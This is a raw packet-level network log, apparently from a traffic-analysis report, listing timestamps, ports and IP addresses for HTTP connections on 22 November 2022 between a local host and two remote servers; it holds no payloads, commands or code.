                                                                                Nov 22, 2022 05:10:22.012052059 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012106895 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.012196064 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012293100 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012335062 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012343884 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.012403011 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012459040 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.012461901 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012510061 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012562037 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012564898 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.012670040 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012722015 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.012763977 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012865067 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012916088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.012923956 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.013006926 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.013067007 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.013098955 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.013195038 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.013245106 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.013309956 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.013351917 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.013401985 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.013443947 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.013503075 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.013555050 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.013632059 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.013726950 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.013776064 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.013782024 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.013969898 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014012098 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014022112 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.014070034 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014120102 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.014219999 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014260054 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014311075 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.014353991 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014446974 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014498949 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.014514923 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014611006 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014661074 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.014667988 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014816046 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014872074 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.014946938 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.014955044 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015007019 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.015047073 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015106916 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015161991 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.015249014 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015290022 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015341043 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.015499115 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015541077 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015594006 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.015616894 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015656948 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015707016 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.015782118 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015832901 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015922070 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.015932083 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.016016960 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.016068935 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.016071081 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.016163111 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.016212940 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.070689917 CET4917980192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:10:22.163489103 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.163543940 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.163594961 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.163660049 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.163702965 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.163742065 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.163760900 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.163780928 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.163836002 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.163903952 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.163980007 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.164019108 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.164100885 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.164150953 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.164231062 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.164279938 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.164297104 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.166287899 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.166330099 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.166347027 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.166464090 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.166522026 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.166547060 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.166626930 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.166685104 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.166753054 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.166776896 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.166841030 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.166860104 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.166966915 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.167007923 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.167020082 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.167134047 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.167210102 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.167267084 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.167308092 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.167360067 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.167397976 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.167540073 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.167581081 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.167594910 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.167658091 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.167710066 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.167735100 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.167867899 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.167917967 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.167984009 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168102980 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168143988 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168167114 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.168184042 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168239117 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.168261051 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168390989 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168431044 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168457985 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.168530941 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168586016 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.168611050 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168747902 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168817043 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.168817997 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168896914 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.168947935 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.168958902 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.169070959 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.169121027 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.169183969 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.169261932 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.169310093 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.169343948 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.169466019 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.169507980 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.169517040 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.169629097 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.169678926 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.169708014 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.169785023 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.169835091 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.169907093 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.169985056 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.170032978 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.170068026 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.170144081 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.170205116 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.170223951 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.170300961 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.170348883 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.170387030 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.170464039 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.170521975 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.170593023 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.249553919 CET804917934.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:22.249660015 CET4917980192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:10:22.249874115 CET4917980192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:10:22.317977905 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.318041086 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.318073988 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.318084002 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.318125010 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.318151951 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.318166971 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.318226099 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.318274975 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.318316936 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.318356037 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.318367004 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.318495989 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.318553925 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.318559885 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.320101976 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.320179939 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.320199966 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.320396900 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.320439100 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.320451975 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.320502996 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.320554018 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.320581913 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.320661068 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.320713043 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.320789099 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.320831060 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.320880890 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.320981026 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.321111917 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.321162939 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.321175098 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.321254015 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.321302891 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.321377993 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.321455956 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.321506023 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.321547031 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.321628094 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.321679115 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.321736097 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.321907043 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.321957111 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.321985960 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.322065115 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.322113991 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.322185040 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.322227001 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.322283983 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.322355986 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.322434902 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.322487116 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.322554111 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.322593927 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.322648048 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.322756052 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.322844028 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.322911978 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.322917938 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.322984934 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.323039055 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.323064089 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.323239088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.323282003 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.323291063 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.323391914 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.323446035 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.323472977 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.323549986 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.323600054 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.323630095 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.323760033 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.323798895 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.323813915 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.323882103 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.323939085 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.323961020 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.324034929 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.324099064 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.324166059 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.324207067 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.324259996 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.324284077 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.324400902 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.324465036 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.324484110 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.324523926 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.324580908 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.324618101 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.427450895 CET804917934.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:22.472196102 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.472239971 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.472255945 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.472271919 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.472310066 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.472310066 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.472327948 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.472429991 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.472486019 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.472563028 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.472640038 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.472721100 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.472760916 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.472778082 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.473931074 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.474018097 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.474071980 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.474117994 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.474241018 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.474481106 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.474536896 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.474565983 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.474685907 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.474718094 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.474772930 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.474859953 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.474925995 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.474988937 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.475037098 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.475089073 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.475140095 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.475207090 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.475363016 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.475521088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.475575924 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.475650072 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.475667000 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.475706100 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.475801945 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.475838900 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.475961924 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.476001024 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.476017952 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.476124048 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.476200104 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.476250887 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.476281881 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.476402998 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.476442099 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.476495028 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.476695061 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.476712942 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.476761103 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.476767063 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.476802111 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.476862907 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.476922989 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477042913 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477123976 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477179050 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.477205992 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477283001 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477361917 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477417946 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.477443933 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477603912 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477641106 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477694035 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.477725029 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477819920 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477963924 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.477999926 CET8049178183.78.168.24192.168.2.22
